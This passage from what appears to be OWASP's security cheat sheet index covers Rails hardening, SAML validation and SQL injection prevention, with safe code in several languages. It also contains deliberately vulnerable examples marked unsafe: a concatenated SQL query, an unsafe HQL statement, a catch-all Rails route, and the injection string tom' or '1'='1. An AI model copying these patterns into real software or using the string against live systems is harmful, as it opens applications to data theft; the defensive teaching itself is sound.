There is a more general OWASP resource about unvalidated redirects and forwards.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#dynamic-render-paths","title":"Dynamic Render Paths","text":"

In Rails, controller actions and views can dynamically determine which view or partial to render by calling the render method. If user input is used in or for the template name, an attacker could cause the application to render an arbitrary view, such as an administrative page.

Care should be taken when using user input to determine which view to render. If possible, avoid any user input in the name or path to the view.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#cross-origin-resource-sharing","title":"Cross Origin Resource Sharing","text":"

Occasionally, a need arises to share resources with another domain. For example, a file-upload function that sends data via an AJAX request to another domain. In these cases, the same-origin rules followed by web browsers must be bent. Modern browsers, in compliance with HTML5 standards, will allow this to occur, but a couple of precautions must be taken.

When using a nonstandard HTTP construct, such as an atypical Content-Type header, for example, the following applies:

The receiving site should list only those domains allowed to make such requests as well as set the Access-Control-Allow-Origin header in both the response to the OPTIONS request and POST request. This is because the OPTIONS request is sent first, in order to determine if the remote or receiving site allows the requesting domain. Next, a second request, a POST request, is sent. Once again, the header must be set in order for the transaction to be shown as successful.

When standard HTTP constructs are used:

The request is sent and the browser, upon receiving a response, inspects the response headers in order to determine if the response can and should be processed.

Allow list in Rails:

Gemfile:

gem 'rack-cors', :require => 'rack/cors'\n

config/application.rb:

module Sample\nclass Application < Rails::Application\nconfig.middleware.use Rack::Cors do\nallow do\norigins 'someserver.example.com'\nresource %r{/users/\\d+.json},\n:headers => ['Origin', 'Accept', 'Content-Type'],\n:methods => [:post, :get]\nend\nend\nend\nend\n
"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#security-related-headers","title":"Security-related headers","text":"

To set a header value, simply access the response.headers object as a hash inside your controller (often in a before/after_filter).

response.headers['X-header-name'] = 'value'\n

Rails provides the default_headers functionality that will automatically apply the values supplied. This works for most headers in almost all cases.

ActionDispatch::Response.default_headers = {\n'X-Frame-Options' => 'SAMEORIGIN',\n'X-Content-Type-Options' => 'nosniff',\n'X-XSS-Protection' => '0'\n}\n

Strict Transport Security is a special case; it is set in an environment file (e.g. production.rb):

config.force_ssl = true\n

For those not on the edge, there is a library (secure_headers) for the same behavior with content security policy abstraction provided. It will automatically apply logic based on the user agent to produce a concise set of headers.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#business-logic-bugs","title":"Business Logic Bugs","text":"

Any application in any technology can contain business logic errors that result in security bugs. Business logic bugs are difficult to impossible to detect using automated tools. The best ways to prevent business logic security bugs are to do code review, pair program and write unit tests.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#attack-surface","title":"Attack Surface","text":"

Generally speaking, Rails avoids open redirect and path traversal types of vulnerabilities because of its /config/routes.rb file which dictates what URLs should be accessible and handled by which controllers. The routes file is a great place to look when thinking about the scope of the attack surface.

An example might be as follows:

# this is an example of what NOT to do\nmatch ':controller(/:action(/:id(.:format)))'\n

In this case, this route allows any public method on any controller to be called as an action. As a developer, you want to make sure that users can only reach the controller methods intended and in the way intended.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#sensitive-files","title":"Sensitive Files","text":"

Many Ruby on Rails apps are open source and hosted on publicly available source code repositories. Whether that is the case or the code is committed to a corporate source control system, there are certain files that should be either excluded or carefully managed.

/config/database.yml                 -  May contain production credentials.\n/config/initializers/secret_token.rb -  Contains a secret used to hash session cookie.\n/db/seeds.rb                         -  May contain seed data including bootstrap admin user.\n/db/development.sqlite3              -  May contain real data.\n
"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#encryption","title":"Encryption","text":"

Rails uses OS encryption. Generally speaking, it is always a bad idea to write your own encryption.

Devise by default uses bcrypt for password hashing, which is an appropriate solution.

Typically, the following config in /config/initializers/devise.rb results in 10 stretches in production:

config.stretches\u00a0=\u00a0Rails.env.test?\u00a0?\u00a01\u00a0:\u00a010\n
"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#updating-rails-and-having-a-process-for-updating-dependencies","title":"Updating Rails and Having a Process for Updating Dependencies","text":"

In early 2013, a number of critical vulnerabilities were identified in the Rails Framework. Organizations that had fallen behind current versions had more trouble updating and harder decisions along the way, including patching the source code for the framework itself.

An additional concern with Ruby applications in general is that most libraries (gems) are not signed by their authors, making it practically impossible to build a Rails-based project using only libraries whose provenance can be verified. One good practice might be to audit the gems you are using.

In general, it is important to have a process for updating dependencies. An example process might define three mechanisms for triggering an update:

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#tools","title":"Tools","text":"

Use brakeman, an open source code analysis tool for Rails applications, to identify many potential issues. It will not necessarily produce comprehensive security findings, but it can find easily exposed issues. A great way to see potential issues in Rails is to review the brakeman documentation of warning types.

A newer alternative is bearer, an open source code security and privacy analysis tool for both Ruby and JavaScript/TypeScript code, in order to identify a broad range of OWASP Top 10 potential issues. It provides many configuration options and can easily integrate into your CI/CD pipeline.

There are emerging tools that can be used to track security issues in dependency sets, like automated scanning from GitHub and GitLab.

Another area of tooling is the security testing tool Gauntlt, which is built on cucumber and uses gherkin syntax to define attack files.

Launched in May 2013 and very similar to the brakeman scanner, the dawnscanner rubygem is a static analyzer for security issues that works with Rails, Sinatra and Padrino web applications. Version 1.6.6 has more than 235 Ruby-specific CVE security checks.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#related-articles-and-references","title":"Related Articles and References","text":""},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html","title":"SAML Security Cheat Sheet","text":""},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The Security Assertion Markup Language (SAML) is an open standard for exchanging authorization and authentication information. The Web Browser SAML/SSO Profile with Redirect/POST bindings is one of the most common SSO implementations. This cheatsheet will focus primarily on that profile.

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#validate-message-confidentiality-and-integrity","title":"Validate Message Confidentiality and Integrity","text":"

TLS 1.2 is the most common solution to guarantee message confidentiality and integrity at the transport layer. Refer to SAML Security (section 4.2.1) for additional information. This step will help counter the following attacks:

A digitally signed message with a certified key is the most common solution to guarantee message integrity and authentication. Refer to SAML Security (section 4.3) for additional information. This step will help counter the following attacks:

Assertions may be encrypted via XMLEnc to prevent disclosure of sensitive attributes post transportation. Refer to SAML Security (section 4.2.2) for additional information. This step will help counter the following attacks:

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#validate-protocol-usage","title":"Validate Protocol Usage","text":"

This is a common area for security gaps - see Google SSO vulnerability for a real life example. Their SSO profile was vulnerable to a Man-in-the-middle attack from a malicious SP (Service Provider).

The SSO Web Browser Profile is most susceptible to attacks from trusted partners. This particular security flaw was exposed because the SAML Response did not contain all of the required data elements necessary for a secure message exchange. Following the SAML Profile usage requirements for AuthnRequest (4.1.4.1) and Response (4.1.4.2) will help counter this attack.

The AVANTSSAR team suggested the following data elements should be required:

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#validate-signatures","title":"Validate Signatures","text":"

Vulnerabilities in SAML implementations due to XML Signature Wrapping attacks were described in 2012, On Breaking SAML: Be Whoever You Want to Be.

The following recommendations were proposed in response (Secure SAML validation to prevent XML signature wrapping attacks):
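
As a rough illustration of the signature-validation part of those recommendations, here is a minimal sketch using the JDK's built-in javax.xml.crypto XML Digital Signature API; it assumes a trusted IdP public key (idpKey) is already available, and the names are illustrative. Note that signature validation alone does not defeat wrapping attacks: the service provider must also verify that the element it consumes is the element that was actually signed.

import javax.xml.crypto.dsig.XMLSignature;
import javax.xml.crypto.dsig.XMLSignatureFactory;
import javax.xml.crypto.dsig.dom.DOMValidateContext;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;

// Sketch only: validates the XML signature on a SAML response with the JDK XML DSig API.
static boolean isResponseSignatureValid(java.io.InputStream samlResponse,
                                        java.security.PublicKey idpKey) throws Exception {
    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
    dbf.setNamespaceAware(true);
    dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); // XXE hardening
    Document doc = dbf.newDocumentBuilder().parse(samlResponse);

    NodeList signatures = doc.getElementsByTagNameNS(XMLSignature.XMLNS, "Signature");
    if (signatures.getLength() != 1) {
        return false; // reject zero or multiple signatures in this simplified sketch
    }
    DOMValidateContext ctx = new DOMValidateContext(idpKey, signatures.item(0));
    boolean coreValid = XMLSignatureFactory.getInstance("DOM")
            .unmarshalXMLSignature(ctx).validate(ctx);
    // A real implementation must additionally confirm that the signed element is the
    // exact Assertion/Response element the application goes on to consume.
    return coreValid;
}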

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#validate-protocol-processing-rules","title":"Validate Protocol Processing Rules","text":"

This is another common area for security gaps simply because of the vast number of steps to assert.

Processing a SAML response is an expensive operation but all steps must be validated:

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#validate-binding-implementation","title":"Validate Binding Implementation","text":""},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#validate-security-countermeasures","title":"Validate Security Countermeasures","text":"

Revisit each security threat that exists within the SAML Security document and assert you have applied the appropriate countermeasures for threats that may exist for your particular implementation.

Additional countermeasures considered should include:

Need an architectural diagram? The SAML technical overview contains the most complete diagrams. For the Web Browser SSO Profile with Redirect/POST bindings refer to the section 4.1.3. In fact, of all the SAML documentation, the technical overview is the most valuable from a high-level perspective.

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#unsolicited-response-ie-idp-initiated-sso-considerations-for-service-providers","title":"Unsolicited Response (ie. IdP Initiated SSO) Considerations for Service Providers","text":"

Unsolicited Response is inherently less secure by design due to the lack of CSRF protection. However, it is supported by many due to the backwards compatibility feature of SAML 1.1. The general security recommendation is to not support this type of authentication, but if it must be enabled, the following steps (in addition to everything mentioned above) should help you secure this flow:

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#identity-provider-and-service-provider-considerations","title":"Identity Provider and Service Provider Considerations","text":"

The SAML protocol itself is rarely the attack vector of choice, though it is still important to make sure its use is robust. The various endpoints are targeted more often, so how the SAML token is generated and how it is consumed are both important in practice.

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#identity-provider-idp-considerations","title":"Identity Provider (IdP) Considerations","text":""},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#service-provider-sp-considerations","title":"Service Provider (SP) Considerations","text":""},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#input-validation","title":"Input Validation","text":"

Just because SAML is a security protocol does not mean that input validation goes away.

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#cryptography","title":"Cryptography","text":"

Solutions relying on cryptographic algorithms need to follow the latest developments in cryptanalysis.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html","title":"SQL Injection Prevention Cheat Sheet","text":""},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article is focused on providing clear, simple, actionable guidance for preventing SQL Injection flaws in your applications. SQL Injection attacks are unfortunately very common, and this is due to two factors:

  1. the significant prevalence of SQL Injection vulnerabilities, and
  2. the attractiveness of the target (i.e., the database typically contains all the interesting/critical data for your application).

SQL Injection flaws are introduced when software developers create dynamic database queries constructed with string concatenation which includes user-supplied input. Avoiding SQL Injection flaws is simple. Developers need to either: a) stop writing dynamic queries with string concatenation; and/or b) prevent user-supplied input which contains malicious SQL from affecting the logic of the executed query.

This article provides a set of simple techniques for preventing SQL Injection vulnerabilities by avoiding these two problems. These techniques can be used with practically any kind of programming language with any type of database. There are other types of databases, like XML databases, which can have similar problems (e.g., XPath and XQuery injection) and these techniques can be used to protect them as well.

Primary Defenses:

Additional Defenses:

Unsafe Example:

SQL injection flaws typically look like this:

The following (Java) example is UNSAFE, and would allow an attacker to inject code into the query that would be executed by the database. The unvalidated \"customerName\" parameter that is simply appended to the query allows an attacker to inject any SQL code they want. Unfortunately, this method for accessing databases is all too common.

String\u00a0query\u00a0=\u00a0\"SELECT\u00a0account_balance\u00a0FROM\u00a0user_data\u00a0WHERE\u00a0user_name\u00a0=\u00a0\"\n+\u00a0request.getParameter(\"customerName\");\ntry\u00a0{\nStatement\u00a0statement\u00a0=\u00a0connection.createStatement(\u00a0...\u00a0);\nResultSet\u00a0results\u00a0=\u00a0statement.executeQuery(\u00a0query\u00a0);\n}\n...\n
"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#primary-defenses","title":"Primary Defenses","text":""},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#defense-option-1-prepared-statements-with-parameterized-queries","title":"Defense Option 1: Prepared Statements (with Parameterized Queries)","text":"

The use of prepared statements with variable binding (aka parameterized queries) is how all developers should first be taught how to write database queries. They are simple to write, and easier to understand than dynamic queries. Parameterized queries force the developer to first define all the SQL code, and then pass in each parameter to the query later. This coding style allows the database to distinguish between code and data, regardless of what user input is supplied.

Prepared statements ensure that an attacker is not able to change the intent of a query, even if SQL commands are inserted by an attacker. In the safe example below, if an attacker were to enter the userID of tom' or '1'='1, the parameterized query would not be vulnerable and would instead look for a username which literally matched the entire string tom' or '1'='1.

Language specific recommendations:

In rare circumstances, prepared statements can harm performance. When confronted with this situation, it is best to either a) strongly validate all data or b) escape all user supplied input using an escaping routine specific to your database vendor as described below, rather than using a prepared statement.

Safe Java Prepared Statement Example:

The following code example uses a PreparedStatement, Java's implementation of a parameterized query, to execute the same database query.

//\u00a0This\u00a0should\u00a0REALLY\u00a0be\u00a0validated\u00a0too\nString\u00a0custname\u00a0=\u00a0request.getParameter(\"customerName\");\n//\u00a0Perform\u00a0input\u00a0validation\u00a0to\u00a0detect\u00a0attacks\nString\u00a0query\u00a0=\u00a0\"SELECT\u00a0account_balance\u00a0FROM\u00a0user_data\u00a0WHERE\u00a0user_name\u00a0=\u00a0?\u00a0\";\nPreparedStatement pstmt = connection.prepareStatement( query );\npstmt.setString(\u00a01,\u00a0custname);\nResultSet\u00a0results\u00a0=\u00a0pstmt.executeQuery(\u00a0);\n

Safe C# .NET Prepared Statement Example:

With .NET, it's even more straightforward. The creation and execution of the query doesn't change. All you have to do is simply pass the parameters to the query using the Parameters.Add() call as shown here.

String query = \"SELECT account_balance FROM user_data WHERE user_name = ?\";\ntry {\nOleDbCommand command = new OleDbCommand(query, connection);\ncommand.Parameters.Add(new OleDbParameter(\"customerName\", CustomerName.Text));\nOleDbDataReader reader = command.ExecuteReader();\n// ...\n} catch (OleDbException se) {\n// error handling\n}\n

We have shown examples in Java and .NET, but practically all other languages, including Cold Fusion and Classic ASP, support parameterized query interfaces. Even SQL abstraction layers, like the Hibernate Query Language (HQL), have the same type of injection problems (which we call HQL Injection). HQL supports parameterized queries as well, so we can avoid this problem:

Hibernate Query Language (HQL) Prepared Statement (Named Parameters) Examples:

//First\u00a0is\u00a0an\u00a0unsafe\u00a0HQL\u00a0Statement\nQuery\u00a0unsafeHQLQuery\u00a0=\u00a0session.createQuery(\"from\u00a0Inventory\u00a0where\u00a0productID='\"+userSuppliedParameter+\"'\");\n//Here\u00a0is\u00a0a\u00a0safe\u00a0version\u00a0of\u00a0the\u00a0same\u00a0query\u00a0using\u00a0named\u00a0parameters\nQuery\u00a0safeHQLQuery\u00a0=\u00a0session.createQuery(\"from\u00a0Inventory\u00a0where\u00a0productID=:productid\");\nsafeHQLQuery.setParameter(\"productid\",\u00a0userSuppliedParameter);\n

For examples of parameterized queries in other languages, including Ruby, PHP, Cold Fusion, Perl, and Rust, see the Query Parameterization Cheat Sheet or this site.

Developers tend to like the Prepared Statement approach because all the SQL code stays within the application. This makes your application relatively database independent.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#defense-option-2-stored-procedures","title":"Defense Option 2: Stored Procedures","text":"

Stored procedures are not always safe from SQL injection. However, certain standard stored procedure programming constructs have the same effect as the use of parameterized queries when implemented safely, which is the norm for most stored procedure languages.

They require the developer to just build SQL statements with parameters which are automatically parameterized unless the developer does something largely out of the norm. The difference between prepared statements and stored procedures is that the SQL code for a stored procedure is defined and stored in the database itself, and then called from the application. Both of these techniques have the same effectiveness in preventing SQL injection so your organization should choose which approach makes the most sense for you.

Note: \"Implemented safely\" means the stored procedure does not include any unsafe dynamic SQL generation. Developers do not usually generate dynamic SQL inside stored procedures. However, it can be done, but should be avoided. If it can't be avoided, the stored procedure must use input validation or proper escaping as described in this article to make sure that all user supplied input to the stored procedure can't be used to inject SQL code into the dynamically generated query. Auditors should always look for uses of sp_execute, execute or exec within SQL Server stored procedures. Similar audit guidelines are necessary for similar functions for other vendors.

There are also several cases where stored procedures can increase risk. For example, on MS SQL Server, you have 3 main default roles: db_datareader, db_datawriter and db_owner. Before stored procedures came into use, DBAs would give db_datareader or db_datawriter rights to the webservice's user, depending on the requirements. However, stored procedures require execute rights, a role that is not available by default. Some setups where the user management has been centralized, but is limited to those 3 roles, cause all web apps to run under db_owner rights so stored procedures can work. Naturally, that means that if a server is breached the attacker has full rights to the database, where previously they might only have had read access.

Safe Java Stored Procedure Example:

The following code example uses a CallableStatement, Java's implementation of the stored procedure interface, to execute the same database query. The sp_getAccountBalance stored procedure would have to be predefined in the database and implement the same functionality as the query defined above.

//\u00a0This\u00a0should\u00a0REALLY\u00a0be\u00a0validated\nString\u00a0custname\u00a0=\u00a0request.getParameter(\"customerName\");\ntry\u00a0{\nCallableStatement cs = connection.prepareCall(\"{call sp_getAccountBalance(?)}\");\ncs.setString(1, custname);\nResultSet\u00a0results\u00a0=\u00a0cs.executeQuery();\n//\u00a0\u2026\u00a0result\u00a0set\u00a0handling\n}\u00a0catch\u00a0(SQLException\u00a0se)\u00a0{\n//\u00a0\u2026\u00a0logging\u00a0and\u00a0error\u00a0handling\n}\n

Safe VB .NET Stored Procedure Example:

The following code example uses a SqlCommand, .NET's implementation of the stored procedure interface, to execute the same database query. The sp_getAccountBalance stored procedure would have to be predefined in the database and implement the same functionality as the query defined above.

\u00a0Try\nDim\u00a0command\u00a0As\u00a0SqlCommand\u00a0=\u00a0new\u00a0SqlCommand(\"sp_getAccountBalance\",\u00a0connection)\ncommand.CommandType = CommandType.StoredProcedure\ncommand.Parameters.Add(new SqlParameter(\"@CustomerName\", CustomerName.Text))\nDim\u00a0reader\u00a0As\u00a0SqlDataReader\u00a0=\u00a0command.ExecuteReader()\n'...\nCatch\u00a0se\u00a0As\u00a0SqlException\n'error\u00a0handling\nEnd\u00a0Try\n
"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#defense-option-3-allow-list-input-validation","title":"Defense Option 3: Allow-list Input Validation","text":"

Various parts of SQL queries aren't legal locations for the use of bind variables, such as the names of tables or columns, and the sort order indicator (ASC or DESC). In such situations, input validation or query redesign is the most appropriate defense. For the names of tables or columns, ideally those values come from the code, and not from user parameters.

But if user parameter values are used for targeting different table names and column names, then the parameter values should be mapped to the legal/expected table or column names to make sure unvalidated user input doesn't end up in the query. Please note, this is a symptom of poor design and a full rewrite should be considered if time allows.

Here is an example of table name validation.

String tableName;\nswitch(PARAM) {\n  case \"Value1\": tableName = \"fooTable\";\n                 break;\n  case \"Value2\": tableName = \"barTable\";\n                 break;\n  ...\n  default: throw new InputValidationException(\"unexpected value provided\"\n                                             + \" for table name\");\n}\n

The tableName can then be directly appended to the SQL query since it is now known to be one of the legal and expected values for a table name in this query. Keep in mind that generic table validation functions can lead to data loss as table names are used in queries where they are not expected.

For something simple like a sort order, it would be best if the user supplied input is converted to a boolean, and then that boolean is used to select the safe value to append to the query. This is a very standard need in dynamic query creation.

For example:

public String someMethod(boolean sortOrder) {\nString SQLquery = \"some SQL ... order by Salary \" + (sortOrder ? \"ASC\" : \"DESC\");\n...\n

Any time user input can be converted to a non-String type, such as a date, numeric, boolean, or enumerated type, before it is appended to a query, or used to select a value to append to the query, the conversion ensures it is safe to do so.
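
For instance, a minimal sketch of this idea, reusing the request.getParameter style from the earlier examples (the parameter names are illustrative):

// Sketch: parse user input into typed values before they ever touch the query string.
int accountId = Integer.parseInt(request.getParameter("accountId"));   // rejects non-numeric input
boolean ascending = Boolean.parseBoolean(request.getParameter("asc")); // anything but "true" becomes false
String query = "SELECT account_balance FROM user_data WHERE account_id = " + accountId
             + " ORDER BY account_balance " + (ascending ? "ASC" : "DESC");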

Input validation is also recommended as a secondary defense in ALL cases, even when using bind variables as is discussed later in this article. More techniques on how to implement strong input validation are described in the Input Validation Cheat Sheet.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#defense-option-4-escaping-all-user-supplied-input","title":"Defense Option 4: Escaping All User-Supplied Input","text":"

This technique should only be used as a last resort, when none of the above are feasible. Input validation is probably a better choice as this methodology is frail compared to other defenses and we cannot guarantee it will prevent all SQL Injections in all situations.

This technique is to escape user input before putting it in a query. It is very database specific in its implementation. It's usually only recommended to retrofit legacy code when implementing input validation isn't cost effective. Applications built from scratch, or applications requiring low risk tolerance should be built or re-written using parameterized queries, stored procedures, or some kind of Object Relational Mapper (ORM) that builds your queries for you.

This technique works as follows: each DBMS supports one or more character escaping schemes specific to certain kinds of queries. If you then escape all user-supplied input using the proper escaping scheme for the database you are using, the DBMS will not confuse that input with SQL code written by the developer, thus avoiding any possible SQL injection vulnerabilities.

The OWASP Enterprise Security API (ESAPI) is a free, open source, web application security control library that makes it easier for programmers to write lower-risk applications. The ESAPI libraries are designed to make it easier for programmers to retrofit security into existing applications. The ESAPI libraries also serve as a solid foundation for new development:

To find the javadoc specifically for the database encoders, click on the Codec class on the left hand side. There are lots of Codecs implemented. The two Database specific codecs are OracleCodec, and MySQLCodec.

Just click on their names in the All Known Implementing Classes: at the top of the Interface Codec page.

At this time, ESAPI currently has database encoders for:

Database encoders are forthcoming for:

If your database encoder is missing, please let us know.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#database-specific-escaping-details","title":"Database Specific Escaping Details","text":"

If you want to build your own escaping routines, here are the escaping details for each of the databases that we have developed ESAPI Encoders for:

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#oracle-escaping","title":"Oracle Escaping","text":"

This information is based on the Oracle Escape character information.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#escaping-dynamic-queries","title":"Escaping Dynamic Queries","text":"

Using an ESAPI database codec is pretty simple. An Oracle example looks something like:

ESAPI.encoder().encodeForSQL(\u00a0new\u00a0OracleCodec(),\u00a0queryparam\u00a0);\n

So, if you had an existing Dynamic query being generated in your code that was going to Oracle that looked like this:

String\u00a0query\u00a0=\u00a0\"SELECT\u00a0user_id\u00a0FROM\u00a0user_data\u00a0WHERE\u00a0user_name\u00a0=\u00a0'\"\n+\u00a0req.getParameter(\"userID\")\n+\u00a0\"'\u00a0and\u00a0user_password\u00a0=\u00a0'\"\u00a0+\u00a0req.getParameter(\"pwd\")\u00a0+\"'\";\ntry\u00a0{\nStatement\u00a0statement\u00a0=\u00a0connection.createStatement(\u00a0\u2026\u00a0);\nResultSet\u00a0results\u00a0=\u00a0statement.executeQuery(\u00a0query\u00a0);\n}\n

You would rewrite the first line to look like this:

Codec ORACLE_CODEC = new OracleCodec();\nString query = \"SELECT user_id FROM user_data WHERE user_name = '\"\n+ ESAPI.encoder().encodeForSQL( ORACLE_CODEC, req.getParameter(\"userID\"))\n+ \"' and user_password = '\"\n+ ESAPI.encoder().encodeForSQL( ORACLE_CODEC, req.getParameter(\"pwd\")) +\"'\";\n

And it would now be safe from SQL injection, regardless of the input supplied.

For maximum code readability, you could also construct your own OracleEncoder:

Encoder oe = new OracleEncoder();\nString query = \"SELECT user_id FROM user_data WHERE user_name = '\"\n+ oe.encode( req.getParameter(\"userID\")) + \"' and user_password = '\"\n+ oe.encode( req.getParameter(\"pwd\")) +\"'\";\n

With this type of solution, you would need only to wrap each user-supplied parameter being passed into an ESAPI.encoder().encodeForOracle( ) call or whatever you named the call and you would be done.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#turn-off-character-replacement","title":"Turn off character replacement","text":"

Use SET DEFINE OFF or SET SCAN OFF to ensure that automatic character replacement is turned off. If this character replacement is turned on, the & character will be treated like a SQLPlus variable prefix that could allow an attacker to retrieve private data.

See here and here for more information

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#escaping-wildcard-characters-in-like-clauses","title":"Escaping Wildcard characters in Like Clauses","text":"

The LIKE keyword allows for text scanning searches. In Oracle, the underscore _ character matches only one character, while the percent sign % is used to match zero or more occurrences of any characters. These characters must be escaped in LIKE clause criteria.

For example:

SELECT\u00a0name\u00a0FROM\u00a0emp\u00a0WHERE\u00a0id\u00a0LIKE\u00a0'%/_%'\u00a0ESCAPE\u00a0'/';\n\nSELECT\u00a0name\u00a0FROM\u00a0emp\u00a0WHERE\u00a0id\u00a0LIKE\u00a0'%\\%%'\u00a0ESCAPE\u00a0'\\';\n
"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#oracle-10g-escaping","title":"Oracle 10g escaping","text":"

An alternative for Oracle 10g and later is to place { and } around the string to escape the entire string. However, you have to be careful that there isn't a } character already in the string. You must search for these and if there is one, then you must replace it with }}. Otherwise that character will end the escaping early, and may introduce a vulnerability.
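
A minimal sketch of that check and replacement (the helper name is illustrative, and this assumes the value is otherwise handled as described above):

// Sketch of Oracle 10g+ brace escaping: double any closing brace so it cannot end
// the escape block early, then wrap the whole value in { ... }.
static String escapeOracle10g(String input) {
    return "{" + input.replace("}", "}}") + "}";
}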

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#mysql-escaping","title":"MySQL Escaping","text":"

MySQL supports two escaping modes:

  1. ANSI_QUOTES SQL mode, and a mode with this off, which we call
  2. MySQL mode.

ANSI SQL mode: Simply encode all ' (single tick) characters with '' (two single ticks)

MySQL mode, do the following:

NUL (0x00) --> \\0  [This is a zero, not the letter O]\nBS  (0x08) --> \\b\nTAB (0x09) --> \\t\nLF  (0x0a) --> \\n\nCR  (0x0d) --> \\r\nSUB (0x1a) --> \\Z\n\"   (0x22) --> \\\"\n%   (0x25) --> \\%\n'   (0x27) --> \\'\n\\   (0x5c) --> \\\\\n_   (0x5f) --> \\_\nall other non-alphanumeric characters with ASCII values\nless than 256  --> \\c where 'c' is the original non-alphanumeric character.\n

This information is based on the MySQL Escape character information.
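
If you do build your own routine rather than using ESAPI's MySQLCodec, a sketch of the MySQL-mode rules above might look like the following (illustrative only; parameterized queries remain the preferred defense):

// Sketch: apply the MySQL-mode escaping table above to a single input string.
static String escapeMySqlMode(String input) {
    StringBuilder out = new StringBuilder();
    for (char c : input.toCharArray()) {
        switch (c) {
            case 0x00: out.append("\\0"); break;  // NUL
            case 0x08: out.append("\\b"); break;  // backspace
            case 0x09: out.append("\\t"); break;  // tab
            case 0x0a: out.append("\\n"); break;  // line feed
            case 0x0d: out.append("\\r"); break;  // carriage return
            case 0x1a: out.append("\\Z"); break;  // substitute
            case '"':  out.append("\\\""); break;
            case '%':  out.append("\\%"); break;
            case '\'': out.append("\\'"); break;
            case '\\': out.append("\\\\"); break;
            case '_':  out.append("\\_"); break;
            default:
                // All other non-alphanumeric characters below 256 get a leading backslash.
                if (!Character.isLetterOrDigit(c) && c < 256) {
                    out.append('\\');
                }
                out.append(c);
        }
    }
    return out.toString();
}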

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#sql-server-escaping","title":"SQL Server Escaping","text":"

We have not implemented the SQL Server escaping routine yet, but the following resource has good pointers and links to articles describing how to prevent SQL injection attacks on SQL Server: see here.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#db2-escaping","title":"DB2 Escaping","text":"

This information is based on DB2 WebQuery special characters as well as some information from Oracle's JDBC DB2 driver.

Information regarding the differences between several DB2 Universal drivers is also available.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#hex-encoding-all-input","title":"Hex-encoding all input","text":"

A somewhat special case of escaping is the process of hex-encoding the entire string received from the user (this can be seen as escaping every character). The web application should hex-encode the user input before including it in the SQL statement. The SQL statement should take this fact into account and compare the data accordingly.

For example, if we have to look up a record matching a sessionID, and the user transmitted the string abc123 as the session ID, the select statement would be:

SELECT\u00a0...\u00a0FROM\u00a0session WHERE\u00a0hex_encode(sessionID)\u00a0=\u00a0'616263313233'\n

hex_encode should be replaced by the particular facility for the database being used. The string 616263313233 is the hex-encoded version of the string received from the user (it is the sequence of hex values of the ASCII/UTF-8 codes of the user data).

If an attacker were to transmit a string containing a single-quote character followed by their attempt to inject SQL code, the constructed SQL statement will only look like:

... WHERE\u00a0hex_encode\u00a0(\u00a0...\u00a0)\u00a0=\u00a0'2720\u00a0...\u00a0'\n

27 being the ASCII code (in hex) of the single-quote, which is simply hex-encoded like any other character in the string. The resulting SQL can only contain numeric digits and letters a to f, and never any special character that could enable an SQL injection.
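
As an illustration, a small helper of this kind (in Java, matching the example values above) could be:

import java.nio.charset.StandardCharsets;

// Sketch: hex-encode user input before it is compared inside the SQL statement.
static String hexEncode(String userInput) {
    StringBuilder out = new StringBuilder();
    for (byte b : userInput.getBytes(StandardCharsets.UTF_8)) {
        out.append(String.format("%02x", b));
    }
    return out.toString();
}
// hexEncode("abc123") returns "616263313233", as in the SELECT example above.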

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#escaping-sqli-in-php","title":"Escaping SQLi in PHP","text":"

Use prepared statements and parameterized queries. These are SQL statements that are sent to and parsed by the database server separately from any parameters. This way it is impossible for an attacker to inject malicious SQL.

You basically have two options to achieve this:

  1. Using PDO (for any supported database driver):
